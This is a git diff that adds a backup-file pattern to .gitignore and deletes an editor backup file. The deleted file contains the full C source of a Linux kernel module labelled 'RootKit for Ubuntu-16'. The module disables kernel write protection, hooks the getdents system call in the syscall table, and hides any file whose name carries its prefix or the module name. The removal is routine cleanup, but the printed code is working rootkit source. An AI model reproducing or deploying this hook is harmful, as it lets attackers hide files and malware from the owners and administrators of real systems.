diff --git a/.gitignore b/.gitignore index 3beb967..113b5bd 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,3 @@ /.anjuta/ /.anjuta_sym_db.db - +*~ diff --git a/8008135.c~ b/8008135.c~ deleted file mode 100644 index 47776ac..0000000 --- a/8008135.c~ +++ /dev/null @@ -1,95 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include "sysgen.h" - -#define GETDENTS_SYSCALL_NUM 78 -#define WRITE_PROTECT_FLAG (1<<16) -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1) -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) - - - -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; - -MODULE_AUTHOR("JKE"); -MODULE_LICENSE("GPL v2"); -MODULE_DESCRIPTION("RootKit for Ubuntu-16"); - -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); -sys_getdents_t sys_getdents_orig = NULL; - -// our new getdents handler -asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { - int boff; - struct linux_dirent* ent; - long ret = sys_getdents_orig(fd, dirent, count); - char* dbuf; - if (ret <= 0) { - return ret; - } - dbuf = (char*)dirent; - // go through the entries, looking for one that has our prefix - for (boff = 0; boff < ret;) { - ent = (struct linux_dirent*)(dbuf + boff); - - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it - // remove this entry by copying everything after it forward - memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); - // and adjust the length reported - ret -= ent->d_reclen; - } else { - // on to the next entry - boff += ent->d_reclen; - } - } - return ret; -} - -static int __init lkm_example_init(void) { - printk(KERN_INFO "Hello, World!\n"); - - printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - - // record the original getdents handler - sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; - - printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); - - // turn write protect off - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - - // add our new handlers - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; - - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); - - printk(KERN_INFO "New syscall in place\n"); - - return 0; -} -static void __exit lkm_example_exit(void) { - printk(KERN_INFO "Goodbye, World!\n"); - // allow us to write to read onlu pages - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - // set getdents handler back - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); - printk(KERN_INFO "Old syscall back\n"); -} - -module_init(lkm_example_init); -module_exit(lkm_example_exit); \ No newline at end of file